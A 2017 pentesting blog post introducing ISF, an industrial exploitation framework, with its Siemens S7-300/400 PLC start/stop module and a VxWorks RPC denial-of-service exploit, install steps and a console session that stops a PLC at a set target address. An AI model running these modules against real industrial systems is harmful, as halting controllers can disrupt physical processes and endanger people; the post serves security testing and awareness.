Pentesting and Security Personal Blog

Pentesting and Security Personal Blog

isf

Introduction to the framework

ISF (Industrial Exploitation Framework), is a python-based framework for industrial environment exploiting. The framework is based on an open source project routersploit.

Though it currently does not have much content it is still interesting to have around and expand yourself or wait for future updates.

Details

IPC protocol client

| Name | Path | Description |
| ------------------- | ----------------------------- ---------- |: ----------------------: |
Modbus_tcp_client | icssploit / clients / modbus_tcp_client.py | Modbus-TCP client tools |

exploit scripts

| Name | Path | Description |
| ------------------------ | ------------------------ ------------------------------------------ |: ------ ---------------------------------: |
| S7_300_400_plc_control | icssploit / modules / exploits / plcs / siemens / s7_300_400_plc_control.py | S7-300 / 400 PLC Start and Stop Scripts |
Vxworks_rpc_dos | icssploit / modules / exploits / plcs / vxworks / vxworks_rpc_dos.py | Vxworks RPC Remote Denial of Service (CVE-2015-7599) |

Install

python dependencies

  • Gnureadline (OSX only)
  • Requests
  • Paramiko
  • Beautifulsoup4
  • Pysnmp
  • Scapy

Install in Kali2

    git clone https://github.com/dark-lbp/isf/
    cd isf
    python isf.py

Use

Help

Exploits

You can use the TAB key to fill the path.

Options

Show options

    Isf (S7-300 / 400 PLC Control)> show options
    
    Target options:
    
       Name Current settings Description
       ---- ---------------- -----------
       Target Target address acts 192.168.1.1
       Port 102 Target Port
    
    
    Module options:
    
       Name Current settings Description
       ---- ---------------- -----------
       Slot 2 CPU slot number.
       Command 1 Command 0: start plc, 1: stop plc.
    
    
    Isf (S7-300 / 400 PLC Control)
 

Set the options parameter

    Isf (S7-300 / 400 PLC Control)> set target 192.168.70.210
    [+] {'Target': '192.168.70.210'}

Execute module

    Isf (S7-300 / 400 PLC Control)> run
    [*] Running module ...
    [+] Target is alive
    [*] Sending packet to target
    [*] Stop plc
    Isf (S7-300 / 400 PLC Control)

Display the module information

    Isf (S7-300 / 400 PLC Control)> show info

    
    Name:

    S7-300 / 400 PLC Control

    
    Description:

    Use S7comm command to start / stop plc.

    
    Devices:

    - Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
    
    Authors:

    - wenzhe zhu <jtrkid [at] gmail.com>
    
    References:
    
    Isf (S7-300 / 400 PLC Control)

Description document

You can find it here:

github: https://github.com/dark-lbp/isf

Thanks for reading!

maninwire =D

Know your enemy!


Written by maninwire@gmail.com in Tools on mar 01 agosto 2017. Tags: exploit, tool, industrial, scada, framework,